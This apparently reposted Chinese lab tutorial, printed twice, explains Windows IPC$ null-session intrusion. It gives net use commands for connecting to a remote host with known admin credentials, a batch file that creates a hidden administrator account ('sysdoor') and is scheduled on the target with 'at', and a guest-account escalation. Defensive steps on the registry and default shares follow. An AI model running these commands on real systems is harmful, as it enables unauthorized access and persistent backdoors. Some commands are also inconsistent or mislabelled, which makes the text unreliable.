IPC$入侵方法及防范
- 时间:2015年04月02日 15:12:58 来源:魔法猪系统重装大师官网 人气:6214
实验概述
IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是Windows NT的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT在提供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。
设置IPC$的初衷是为了方便管理员的管理,当该功能切被大量用于网络入侵。默认情况下IPC$是已被共享的,除非手动删除了IPC$。
平时我们总能听到有人在说ipc$漏洞,ipc$漏洞,其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说,一定是指微软自己安置的那个‘后门’:空会话(Null session)。
如何查找IPC$漏洞主机?可以使用“流光2000”等软件(http://sec.chinabyte.com/327/9143827.shtml)。
2.1.2 IPC$入侵故障处理
(1)使用IPC$连接失败时,首先考虑一下几点:
远程主机操作系统可能不是Windows NT/2000/XP/2003
远程主机可能删除了IPC$共享
远程主机未开启139或445端口(或防火墙)
查看帮助:net use /?
2.1.3 实验步骤
任务一:利用已知的系统账号和密码进行入侵
假设已经找到了一台这样的主机,地址是202.201.244.100,管理员帐号是Administrator,密码是123456。
(1)开始菜单中进入“命令提示符”窗口。
(2)建立IPC$连接,命令格式为:
net use \\202.201.244.99\ipc$ “123456” /user: “Administrator”
连接成功后,将显示“命令成功完成”的提示信息。
(3)进行网络驱动器映射,将远程主机上的D$映射为本地的G盘。
net use G:\\202.201.244.99\D$
(4)删除网络连接
net use * /del
任务二:在对方系统上留下后门
在远程主机上创建一个后门账号以备将来登陆时使用,编写一个可在远程主机上可以自动运行的文件(例如:批处理文件),利用远程主机的Windows计划任务功能实现远程入侵。
(1)创建一个批处理文件(保存为sysdoor.bat),名为sysdoor的用户账号,密码为123456,并将其加入到administrators(系统管理员组中)。
net user sysdoor 123456 /add
net localgroup administrators sysdoor /add
(2)建立与远程主机的IPC$连接
net use \\202.201.244.99\ipc$ “123456” /user: “Administrator”
(3)将已创建的批处理文件复制到远程主机上
copy sysdoor.bat \\202.201.244.100\d$
(4)利用Windows计划任务定期执行批处理文件
查看远程主机上当前系统时间:net time \\202.201.244.100
让系统在14:00时运行批处理文件:
at \\202.201.244.100 14:00 d:\sysdoor.bat
(5)断开与远程主机上的IPC$连接
net use * /del
(6)在14:00以后,尝试使用sysdoor账号就行IPC$连接。
备注:也可以直接将对方的guest用户账号激活
net user guest /active
net user guest 123456
net localgroup administrators guest /add
任务三:防御IPC$入侵
(1)禁止在连接中进行枚举攻击
运行“regedit”命令,打开HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa,把restrictanonymoussam的值改为1,如下图所示。
(2)禁止默认共享
首先查看共享资源:net share ipc$ /del
删除IPC$共享:net share ipc$ /del
删除admin$共享:net share admin$ /del
删除d$共享:net share d$ /del
备注:添加共享net share c$=c:\
net share d$=d:\
(3)停止Server服务
Net stop server
IPC,入侵,方法,及,防范,实验,概述,IPC,Inter
IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是Windows NT的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT在提供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。
设置IPC$的初衷是为了方便管理员的管理,当该功能切被大量用于网络入侵。默认情况下IPC$是已被共享的,除非手动删除了IPC$。
平时我们总能听到有人在说ipc$漏洞,ipc$漏洞,其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说,一定是指微软自己安置的那个‘后门’:空会话(Null session)。
如何查找IPC$漏洞主机?可以使用“流光2000”等软件(http://sec.chinabyte.com/327/9143827.shtml)。
2.1.2 IPC$入侵故障处理
(1)使用IPC$连接失败时,首先考虑一下几点:
远程主机操作系统可能不是Windows NT/2000/XP/2003
远程主机可能删除了IPC$共享
远程主机未开启139或445端口(或防火墙)
查看帮助:net use /?
2.1.3 实验步骤
任务一:利用已知的系统账号和密码进行入侵
假设已经找到了一台这样的主机,地址是202.201.244.100,管理员帐号是Administrator,密码是123456。
(1)开始菜单中进入“命令提示符”窗口。
(2)建立IPC$连接,命令格式为:
net use \\202.201.244.99\ipc$ “123456” /user: “Administrator”
连接成功后,将显示“命令成功完成”的提示信息。
(3)进行网络驱动器映射,将远程主机上的D$映射为本地的G盘。
net use G:\\202.201.244.99\D$
(4)删除网络连接
net use * /del
任务二:在对方系统上留下后门
在远程主机上创建一个后门账号以备将来登陆时使用,编写一个可在远程主机上可以自动运行的文件(例如:批处理文件),利用远程主机的Windows计划任务功能实现远程入侵。
(1)创建一个批处理文件(保存为sysdoor.bat),名为sysdoor的用户账号,密码为123456,并将其加入到administrators(系统管理员组中)。
net user sysdoor 123456 /add
net localgroup administrators sysdoor /add
(2)建立与远程主机的IPC$连接
net use \\202.201.244.99\ipc$ “123456” /user: “Administrator”
(3)将已创建的批处理文件复制到远程主机上
copy sysdoor.bat \\202.201.244.100\d$
(4)利用Windows计划任务定期执行批处理文件
查看远程主机上当前系统时间:net time \\202.201.244.100
让系统在14:00时运行批处理文件:
at \\202.201.244.100 14:00 d:\sysdoor.bat
(5)断开与远程主机上的IPC$连接
net use * /del
(6)在14:00以后,尝试使用sysdoor账号就行IPC$连接。
备注:也可以直接将对方的guest用户账号激活
net user guest /active
net user guest 123456
net localgroup administrators guest /add
任务三:防御IPC$入侵
(1)禁止在连接中进行枚举攻击
运行“regedit”命令,打开HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa,把restrictanonymoussam的值改为1,如下图所示。
(2)禁止默认共享
首先查看共享资源:net share ipc$ /del
删除IPC$共享:net share ipc$ /del
删除admin$共享:net share admin$ /del
删除d$共享:net share d$ /del
备注:添加共享net share c$=c:\
net share d$=d:\
(3)停止Server服务
Net stop server
上一篇:分手后可曾后悔?超准12星座分手惋惜指数
下一篇:十二星座中谁会与爱擦肩而过